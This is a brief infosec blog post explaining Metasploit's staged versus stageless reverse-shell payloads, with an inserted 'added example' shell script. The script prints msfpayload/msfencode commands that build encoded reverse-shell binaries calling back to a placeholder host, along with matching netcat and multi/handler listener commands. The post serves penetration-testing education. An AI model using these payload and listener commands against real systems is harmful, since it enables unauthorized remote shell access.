Only use a stager if there is a stage to perform on – shell/reverse_tcp vs. shell_reverse_tcp

Hi,

just a quicky:

(If you don’t know what this is about, maybe you want to brush up your knowledge in offensive security.)

If you need to generate a simple reverse shell payload with Metasploit (msfpayload | msfencode), be aware of the difference between shell/reverse_tcp and shell_reverse_tcp!

shell/reverse_tcp is just a stager: it connects back to a Metasploit handler (exploit/multi/handler), which then sends the actual payload, the shell stage, over that connection. If you are sitting in front of a plain netcat listener instead, nobody sends the stage: the stager waits for it, netcat waits for a shell, and neither performs a pretty act for you… shell_reverse_tcp, on the other hand, is the stageless (single) payload: the shell is already in the shellcode, so it works fine against netcat.

If you are using msfpayload alone, you will see a split output (Stage 1 + 2) that reminds you of this. However, if you pipe directly into msfencode, you get no such feedback in the output!
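As an added example (not from the original post), here is a small POSIX shell script that tells the two kinds of payload apart from their names and prints the matching listener next to the generation command, so you never start netcat for a stager. The host 10.0.0.1, port 4444 and the output file names are placeholder assumptions; the payload names are Metasploit's own. (msfpayload and msfencode were later merged into msfvenom, but the payload names and the staged/stageless distinction are unchanged.)

```shell
#!/bin/sh
# Added example, not part of the original post or of the Metasploit project.
# Staged payloads keep the stager in its own path component
# ("linux/x86/shell/reverse_tcp"); stageless ("single") payloads glue stage
# and stager together with an underscore ("linux/x86/shell_reverse_tcp").

# Exit status 0 if the payload name denotes a staged payload.
payload_is_staged() {
    last=${1##*/}                     # last path component, e.g. reverse_tcp
    case "$last" in
        reverse_*|bind_*) return 0 ;; # stager alone => staged
        *)                return 1 ;; # stage_stager  => stageless
    esac
}

# "staged" or "stageless", for humans.
payload_kind() {
    if payload_is_staged "$1"; then echo staged; else echo stageless; fi
}

# Generation command. It is identical for both kinds, which is exactly why the
# pipe into msfencode gives you no warning. Arguments: payload lhost lport outfile.
gen_cmd() {
    printf 'msfpayload %s LHOST=%s LPORT=%s R | msfencode -e x86/shikata_ga_nai -t elf > %s\n' \
        "$1" "$2" "$3" "$4"
}

# Listener that matches the payload kind. Arguments: payload lhost lport.
# A stager needs multi/handler (it delivers the stage); a single payload
# only needs something that answers the TCP connect, e.g. netcat.
listener_cmd() {
    if payload_is_staged "$1"; then
        printf 'msfconsole -q -x "use exploit/multi/handler; set PAYLOAD %s; set LHOST %s; set LPORT %s; exploit"\n' \
            "$1" "$2" "$3"
    else
        printf 'nc -lvp %s\n' "$3"
    fi
}

# Demo with the two payloads from the post (LHOST/LPORT are placeholders).
for p in linux/x86/shell/reverse_tcp linux/x86/shell_reverse_tcp; do
    kind=$(payload_kind "$p")
    echo "# $p is $kind"
    gen_cmd "$p" 10.0.0.1 4444 "rev_$kind.elf"
    listener_cmd "$p" 10.0.0.1 4444
    echo
done
```

The same naming rule covers the Windows payloads (windows/meterpreter/reverse_tcp is staged, windows/meterpreter_reverse_tcp is not), so the check is worth running on whatever name you are about to feed into msfpayload.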

You can also look at the rapid7 module listing:
https://www.rapid7.com/db/modules/payload/linux/x86/shell_reverse_tcp
https://www.rapid7.com/db/modules/payload/linux/x86/shell/reverse_tcp

Regards
Sebastian

This entry was posted in InfoSec.
